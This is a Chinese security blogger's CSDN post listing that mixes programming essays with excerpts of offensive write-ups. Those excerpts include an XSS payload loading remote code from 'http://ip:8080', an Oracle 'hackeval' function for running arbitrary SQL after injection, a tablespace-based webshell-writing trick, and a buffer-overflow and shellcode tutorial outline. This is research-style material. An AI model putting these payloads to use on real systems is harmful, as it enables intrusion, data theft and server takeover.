自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

Quantum Intelligence

(funcall #'(lambda(kj &rest AI)(funcall kj AI)) 'kj021320 'LeonardodaVinci 'Tesla)

  • 博客(125)
  • 资源 (3)
  • 收藏
  • 关注

原创 ART OF WEB-SQL-INJECTION第2卷 ORACLE篇

ART OF WEB-SQL-INJECTION第2卷 ORACLE篇author : kj021320team: I.S.T.O很多人都说什么ASP PHP JSP注射 其实注射最直接是跟数据库有关!然而那些脚本只是一种辅助例如ASP/ASPX JSP 啥限制都没!而PHP则会把 过滤为/ 但是若然不是MYSQL POSTGRESQL SQLITE的话这个功能就废了!但是我觉得这些脚本语言都

2007-08-28 20:57:00 3717 4

转载 一些软件设计的原则

以前本站向大家介绍过一些软件开发的原则,比如优质代码的十诫和Unix传奇(下篇)中所以说的UNIX的设计原则。相信大家从中能够从中学了解到一些设计原理方面的知识,正如我在《再谈“我是怎么招聘程序”》中所说的,一个好的程序员通常由其操作技能、知识水平,经验层力和能力四个方面组成。在这里想和大家说说设计中的一些原则,我认为这些东西属于长期经验总结出来的知识。这些原则,每一个程序员都应该了解。但是请不要

2016-05-15 20:21:56 71253

转载 "差点的更好"设计理念的兴起

我和几乎所有的Common Lisp和CLOS(Common Lisp Object System)的设计者都极度深受麻省理工学院/斯坦福大学(MIT/Stanford)设计风格的影响。这种风格的本质可以用“正确的做法(the right thing)”这个短语来概括。对于这样的设计者,重要的就是要遵循下面的这些设计理念:简单性—设计必须简单,这既是对实现的要求,也是对接口的要求。接口的简

2012-03-12 12:39:28 147927

转载 编程语言的演化过程

大型机盛行的60年代开始出现高级编程语言,大大提高了代码编写效率,然后是微机、网络和现在的云计算时代,相继出现结构化、面向对象和服务导向的计算机语言,让程序代码更接近自然语言的表达,更真实地反映现实中的实体关系。本文的信息图展示了过去数十年来编程语言的演化过程。计算机编程语言在过去几十年发现了许多变化。最先出现的语言是用于科学计算的Fortan和逻辑推演的LISP语言,而现在用于网络编程的语言

2012-03-09 12:21:44 151872

转载 Worse is Better

原文:http://www.jwz.org/doc/worse-is-better.html太经典了转过来The Rise of ``Worse is Better''By Richard GabrielI and just about every designer of Common Lisp and CLOS has hadextreme exposure to t

2012-02-19 23:02:44 149624

转载 函数式编程扫盲篇

1. 概论在过去的近十年的时间里,面向对象编程大行其道。以至于在大学的教育里,老师也只会教给我们两种编程模型,面向过程和面向对象。孰不知,在面向对象产生之前,在面向对象思想产生之前,函数式编程已经有了数十年的历史。那么,接下来,就让我们回顾这个古老又现代的编程模型,让我们看看究竟是什么魔力将这个概念,将这个古老的概念,在21世纪的今天再次拉入了我们的视野。2. 什么是函数式编程

2011-12-01 14:09:37 150479

转载 Lisp语言是怎么来的–LISP 和 AI 的青梅竹马

LISP 语言的历史和一些番外的八卦和有趣的逸事,其实值得花一本书讲。 我打算用三篇文章扼要的介绍一下 LISP 的早期历史。 讲 LISP, 躲不过要讲 AI (人工智能)的,所以干脆我就先八卦八卦他们的青梅竹马好了。翻开任何一本介绍各种编程语言的书,都会毫无惊奇的发现,每每说到 LISP, 通常的话就是”LISP 是适合人工智能(AI)的语言”。我不知道读者读到这句话的时候是怎么理解的,但

2011-11-22 14:14:11 154005 3

转载 富裕在于感悟

生活在于经历,富裕在于感悟

2011-04-03 02:01:00 149789 8

原创 强烈推荐《编码》

强烈推荐《编码:隐匿在计算机软硬件背后的语言 》

2010-07-23 23:58:00 155259 5

原创 Java Back Propagation Neural Network(JAVA反向传播神经网络)

EDITOR: KJ021320BLOG: http://blog.csdn.net/kj021320TEAM: I.S.T.O 好久没写东西了,随便记一下~~如果不记录忘记了真是很浪费啊~ 下面贴的这个是JAVA写的反向传播神经网络,面向对象,把神经元和连结都抽象成对象。其实这个已经不是什么新奇的玩意了,对于分类 回归而言 神经网络是一个选择但并不一定是最好的选择。

2010-03-28 10:02:00 148067 3

原创 化归.归纳.类比.联想

EDITOR: KJ021320BLOG:http://blog.csdn.net/kj021320 本内容源于书籍《化归与归纳.类比.联想》1.       一般与特殊1.1      特殊与一般的关系特殊与一般之间存在着如下关系:若命题P在一般条件

2009-12-12 20:13:00 152514

原创 Javascript Paste Keyboard Shortcuts Hijack

author : kj021320team : I.S.T.O 这样的攻击手段也算是极其无耻 猥琐之极! 所以防御措施一定要做好      首先说一下通过Javascript Paste Keyboard Shortcuts Hijack能做什么???能够读取你本地机器任何文件! 没错!也就是说 你中了任何一个XSS 加上你按了粘贴快捷键后,你就有可能被别人读取你机上任何的文件!

2009-10-10 20:52:00 153609

原创 阿里巴巴集团漏洞报告提交

如果您在使用阿里巴巴集团产品(阿里巴巴,淘宝,支付宝,雅虎口碑,阿里妈妈,阿里软件)过程中,发现了安全漏洞,请发送包含漏洞报告的邮件至 [email protected] 我们会在收到报告后的下一工作日内我们会给您做出响应。我们确认漏洞如果是您首先发现的,我们将给予小礼品以示感谢。对于所有为阿里巴巴产品用户的安全做出贡献的个人和组织,我们表示诚挚的

2009-08-19 11:26:00 153972

原创 各种数据库SQL注入残章

很久没有出来做show了~首先深度鄙视一下BH09讲mysql注射的那个挫人!在中国这些算是科普的东西,居然还能拿去bh讲现在天朝的工作者们哪个不会用into outfile导出shell哇!老外真是老外,不好好研究研究中华文化,感觉有点井底蛙.superhei jx他们在N年前都已经把mysql注射研究透了啦!你说CASI他们看不懂中文,那pangolin也有英文版的吧!也该拿去

2009-08-03 15:10:00 148320 2

原创 ideological of JAVA rootkit and JAVAEE WEBServer trojan

  author : kj021320team : I.S.T.O 0. 只给思路不给代码 1. 对于JDK本身修改核心类包。如rt.jar 替换掉 java.lang.String或者java.lang.Object 2. 对于JAVAEE WEBSERVER替换核心lib的jar 。如TOMCAT 的 jasper-runtime.jar 的org.

2009-02-21 23:45:00 147359 1

原创 JAVAWEB应用的policy安全配置值得深思

Author:kj021320转载请注名出处。Java应用程序环境的安全策略,详细说明了对于不同的代码所拥有的不同资源的许可,它由一个Policy对象来表达。为了让applet(或者运行在SecurityManager下的一个应用程序)能够执行受保护的行为,例如读写文件,applet(或Java应用程序)必须获得那项操作的许可,安全策略文件就是用来实现这些许可。Policy对象可能有多个实体,虽然

2009-01-04 16:38:00 147403 2

原创 攻击越来越趋向于猥琐了

   今天一大早茄子就在群里发了这个连接 http://www.milw0rm.com/papers/265看完后JX也感叹啊,难道以后的路就是要这样猥琐吗?不禁让我想起很久以前别人提过的猥琐欺骗方式  首先设置了鼠标的样式,不会有一个手指的形状,然后绝对定位,透明掉~~

2008-12-30 12:22:00 145402 4

原创 ORACLE HINT 的一些BUG

AUTHOR : KJ0231320TEAM : I.S.T.O以下是对ORACLE HINT FUZZ的时候发现的!select /*+ NO_PUSH_PRED(* dual  --)*/   * from dual以还有好些HINT都会出现如此语法错误或者会使当前Connection会话中断研究了好久都没发现什么细节原因,跟踪不下去了。搁着快有半年了扔出来,后来者可以走少些弯路顺便给出FUZ

2008-12-05 11:15:00 147818 2

转载 人类思维的逻辑结构和算法实现

     本文将从最基本的逻辑分析的角度来分析人类思维的起源和基本过程的逻辑结构等基本问题,以便对于人工智能的设计提供指导性作用!首先分析了现有的人工智能研究所面临的问题,然后提出解决这些问题的办法,然后将分析人类的意识的最基本逻辑表达和人类思维中的各种状态的逻辑内涵,其中包括记忆与遗忘,学习,推理(算法),对象的产生,自我意识,感觉(输入),表达(输出),表达反馈,睡眠,潜意识,感情。然后根据这

2008-11-24 21:14:00 146868 4

原创 read the code read the soul

     很多时候阅读一个人写的代码,真的可以感受出它的性格,思考方向,做事处事的风格,心情等等。

2008-11-21 15:17:00 147010 2

原创 ORACLE 建立数据文件WriteWebShell

  author: kj021320转载请注明出处        其实 类似ORACLE 这样强大的数据库,真没必要用到这么土的办法SQLJ   存储过程写文件也可以,逼于无奈对方机器不支持SQLJ  还有  UTL_FILE包也被干掉了?那 也可以 使用以下我说的这个方式 SQL> create tablespace kjtest datafile e:/w

2008-10-12 10:39:00 147160 8

原创 MSSQL2005 鸡肋提权啊~~-_-

原理具体可以 去看看关于 Writing a .NET Security Exploit PoC>> 一文里面主要采用了  .NET 的两个union 类型转换,然后把代码写到 委托里面直接call 那个委托就以asm 代码执行了你写的code最后绕过了 安全沙盒作者还给了POChttp://www.frijters.net/TypeSafetyExploitPoC.cs.txt后来跟 云舒 刺

2008-09-17 21:33:00 76095

原创 计算机是否能预测彩票,证券---扯谈

说也无聊,某天某个不懂计算机的朋友恳求我帮忙做一个随机出号码的程序,说是要让计算机预计下期的福利彩票无语了...    随便把这个奇闻扔到群内吹水吹水kj 21:21:55刚才有个朋友叫我帮他用程序写一个 福利彩票的kj 21:22:01估计 人想发财想得没办法了就会想这些的rebeyond 21:22:12写什么福利彩票的?rebeyond 21:22:14钓鱼的?amxsa 21:22:23 

2008-09-10 20:42:00 4475 1

原创 HTTP HEADER IMPORT XSS

测试了IE 不成功TMD~~~,FF可以!import.jspresponse.addHeader("Link", " ; REL=stylesheet") ;%> xss   xss.cssbody{-moz-binding:url("http://ip:8080/myweb/1.xml#xss");}body{background: yellow}1.xml                  

2008-08-25 17:43:00 3280 1

转载 算法的力量(李开复)

算法的力量 算法是计算机科学领域最重要的基石之一,但却受到了国内一些程序员的冷落。许多学生看到一些公司在招聘时要求的编程语言五花八门,就产生了一种误解,认为学计算机就是学各种编程语言,或者认为,学习最新的语言、技术、标准就是最好的铺路方法。其实,大家被这些公司误导了。编程语言虽然该学,但是学习计算机算法和理论更重要,因为计算机语言和开发平台日新月异,但万变不离其宗的是那些算法和理论,例

2008-08-23 21:31:00 3786 2

原创 通过getelement定位XSS SHELLCODE

      今天跟AMXSA在弄一个XSS的时候就讨论到,字符长度限制了70个,该XSS是出现在 , 后来他说对方过滤了 " 这样 只能有限的调用。开始我建议他 多弄几个 后来他尝试了发现不可以对方处理             想想平时我们XSS导入一个远程的JS就是为了执行更多的代码,更方便。    1.        window.k=document.createElement(Sc

2008-07-25 15:50:00 2859 2

原创 关于属性中没有对双引号转义的XSS方式 FF IE Opera通杀

     某网站存在一个 storeXSS  利用点如下可以使用 双引号绕过去属性限制,但是不能采用 比较郁闷开始打算  "style="kj:expression(EXP)后来查了查资料!发现expression是IE 才能使用的!郁闷了!而且要XSS的对象是老外 ,不一定会采用IE ,这样跨站攻击起来了,但是效果会大打折扣。想想还是添加事件吧!但是,怎么触发这个事件呢!?   无奈之下让我想

2008-07-20 10:57:00 4330 6

原创 使用newrbe 神经网络模拟sin逼近II

之前 写了一个 NN的测试代码,后来想想发现好象 逼近得不相似,改了一下测试数据!就像你人一样! 因为过去有经历,所以会在经历中找寻类似的,但是 如果你过去没经历,那就没办法预测close all;clear;clc;x = -10:0.03:9.99;y = -9.99 : 0.03 : 10;sinx = sin(x);siny = si

2008-07-13 19:26:00 1825

原创 使用newrbe 神经网络模拟sin逼近

神经网络学习笔记  ...close all;clear;clc;y=-10:0.01:9.99; %从-10到9.99每次递增0.01 取 2000个数据yn=sin(y); %把 y 中 2000个数据全部进行 sin 运算p=y(1:800); %从 y矩阵中取 1~800个数据t=yn(1:800); %从yn 中取 1~800个数据

2008-07-06 17:42:00 3337 2

原创 alibaba安全团队-阿里五虎将 B2B技术部门Q1 OUTING

哈哈,  中间最会摆  造型的就是我啦~~~  左1 的是 SUDDY   左2就是传说中的刺头了  我的右边 是LARRY  角落了里面(右1)  就是 大家所说的  云舒MM了   美女哇! 哈哈!

2008-06-24 17:33:00 11958 10

原创 ORACLE insert 语句中的sql injection

  log by kj021320  08.6.22 众所周知 ORACLE 是不支持用符号分割做 多语句操作的。那么在 insert的时候出现 SQL injection 是否就是鸡肋呢?前段时间我看 某个论坛出现 access版本的 sqlinjection 出现在 insert的地方后来  来回测试几次  发现根本难以利用今天进行DBA培训的时候,随手进行了test,居然

2008-06-22 14:19:00 2734

原创 ORACLE HACKER EVAL

简单版本create or replace function hackeval(sqlstr varchar2)return varchar2 as PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate sqlstr;commit;return sqlstr;end;控制异常版本create or replace funct

2008-06-05 09:34:00 2817 2

转载 Java 理论与实践: 您的小数点到哪里去了?

级别: 初级Brian Goetz ([email protected]), 首席顾问, Quiotix Corp2003 年 4 月 20 日许多程序员在其整个开发生涯中都不曾使用定点或浮点数,可能的例外是,偶尔在计时测试或基准测试程序中会用到。Java语言和类库支持两类非整数类型 ― IEEE 754 浮点( float 和 double ,包装类(wrapper class)为

2008-05-27 09:06:00 1057

转载 Java浮点数的精确计算及表示

(1)、浮点数精确计算胜利油田三流合一项目中一直存在一个问题,就是每次报表统计的物资金额和实际的金额要差那么几分钱,和实际金额不一致,让客户觉得总是不那么舒服,原因是因为我们使用java的浮点类型double来定义物资金额,并且在报表统计中我们经常要进行一些运算,但Java中浮点数(double、float)的计算是非精确计算,请看下面一个例子:    System.out.println

2008-05-27 09:04:00 2742

转载 JAVA研究--字符集编码

问题研究--字符集编码1. 概述本文主要包括以下几个方面:编码基本知识,java,系统软件,url,工具软件等。在下面的描述中,将以"中文"两个字为例,经查表可以知道其GB2312编码是"d6d0 cec4",Unicode编码为"4e2d 6587",UTF编码就是"e4b8ad e69687"。注意,这两个字没有iso8859-1编码,但可以用iso8859-1编码来"表示"。

2008-05-07 18:29:00 1121 2

原创 ORACLE LATERAL-SQL-INJECTION 个人见解

原PAPER地址:http://www.databasesecurity.com/dbsec/lateral-sql-injection.pdf           author : kj021320          team :  I.S.T.O            最近忙啊忙啊的,今天终于有点点时间抽出来看看技术文章了,最近国外又出了关于新型ORA注入技术的PAPER,

2008-04-30 12:48:00 1171 1

原创 ORACLE DBA ROLE重建

           今天犯傻,不小心删除了,本来想revoke某个用户的DBA权限的!习惯用PLSQLDEVELOP的我,顺手在UI那里点了DROP!  汗,操作完之后,还不知道什么回事,切换SYSTEM登陆的时候发现没  CREATE SESSION权限,奇怪了! 后来想想才发现自己误操作了!郁闷啊!DROP ROLE了!晕死!           痛苦之下叫LIVING 帮忙查看DBA RO

2008-04-30 11:30:00 2226

原创 .NET2005 ASPX编译语法分析BUG?

test    void kj()     {        Response.Write("");    } 以上代码中 居然说         Response.Write(""); 有错误!晕死!这样才可以 0_0        Response.Write("");Microsoft  你们 太牛了!~~

2008-04-20 14:51:00 1245

转载 恒心-成功的基石

史泰龙的经历      一提起史泰龙,大家都知道他是一个世界顶尖级的电影巨星,可他的人生经历更让人心酸,更能给人启迪。      史泰龙出生在一个“酒赌”暴力家庭,父亲赌输了就拿他和母亲撒气,母亲喝醉了酒又拿他来发泄,他常常是鼻青脸肿,皮开肉绽。高中毕业后,史泰龙辍学在街头当起了混混儿,直到20岁那年,有一件偶然的事刺痛了他的心。“再也不能这样下去了,要不就会跟父母一样,成为社会的垃圾,人类的渣滓

2008-03-12 23:33:00 2666 1

原创 ASPXSHELL开发之.NET调用非托管DLL小记

author : kj021320     近日来经过团队的一些意见,继续完善ASPXSHELL的BUG以及新加入功能,搞到数据库的地方...当然二话不说,直接去下了官方的ADO.NET 手册翻了翻!要做数据库控制,当然要做基础的2件事了。1. 遍历元数据2. 所有SQL语句操作 那怎么去做这个 遍历元数据呢?打开文档找到OdbcConnection的GetSche

2008-02-18 20:54:00 1548 3

JAVA模拟细胞自动机

JAVA模拟细胞自动机,介绍了细胞自动机的模型与研究的应用

2009-07-07

Q版缓冲区溢出教程(作者:王炜)

Q版缓冲区溢出教程 作者:王炜 目录 写在前面 2 目录 4 前言 6 作者简介 6 主要角色简介 6 阅读指南 6 第一章、Windows下堆栈溢出入门 8 1.1 梦,已经展开 8 1.2 啤酒和杯子――缓冲区溢出原理 8 1.3 神秘的Windows系统 10 1.4 ShellCode编写简介 17 1.5 窥豹一斑――本地缓冲区溢出简单利用 21 1.6 小结——摘自小强的日记 28 1.7 首次实战――FoxMail溢出漏洞编写 29 1.8 牛刀小试――Printer溢出漏洞编写 41 1.9 JMP /CALL EBX——另一种溢出利用方式 42 1.10 拾阶而上——IDA/IDQ溢出漏洞编写 55 课后解惑 58 第二章、Windows下ShellCode编写初步 60 2.1 ShellCode是什么? 60 2.2 简单的例子——编写控制台窗口的ShellCode 63 2.3 ShellCode通用性的初步分析 78 2.4 弹出Windows对话框ShellCode的编写 82 2.5 添加用户ShellCode的编写 88 课后解惑 98 第三章、后门的编写和ShellCode的提取 100 3.1 预备知识 101 3.2 后门总体思路 121 3.3 Telnet后门的高级语言实现 125 3.4 生成ShellCode 136 3.5 进一步的探讨 156 3.6 反连后门ShellCode的编写 160 课后解惑 166 第四章 Windows下堆溢出利用编程 168 4.1 堆溢出初探 168 4.2 RtlAllcoateHeap的失误 170 4.3 实例——Message堆溢出漏洞的利用 191 4.4 RtlFreeHeap的失误 197 4.5 堆溢出的其他利用方式 204 4.6 实例——JPEG处理堆溢出漏洞的利用 208 课后解惑 215 第五章 ShellCode变形编码大法 217 5.1 为什么要编码 217 5.2 简单的编码——异或大法 221 5.3 简便的变形——微调法 231 5.4 直接替换法 233 5.5 字符拆分法 239 5.6 内存搜索法 247 5.7 搜索实例——Serv_U漏洞的利用 249 5.8 “计算与你同行”—— Computing & Society 257 课后解惑 258 第六章 ShellCode编写高级技术 260 6.1 通用ShellCode的编写 260 6.2 ShellCode的高效提取技巧 285 6.3 ShellCode的高级功能 294 课后解惑 305 第七章、漏洞的发现、分析和利用 308 7.1 CCProxy 漏洞的分析 308 7.2 黑盒法探测漏洞和Python脚本 319 7.3 白盒法和IDA分析漏洞 333 尾声 347

2008-11-24

ReplaceIE

替换浏览的代码

2007-06-24

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除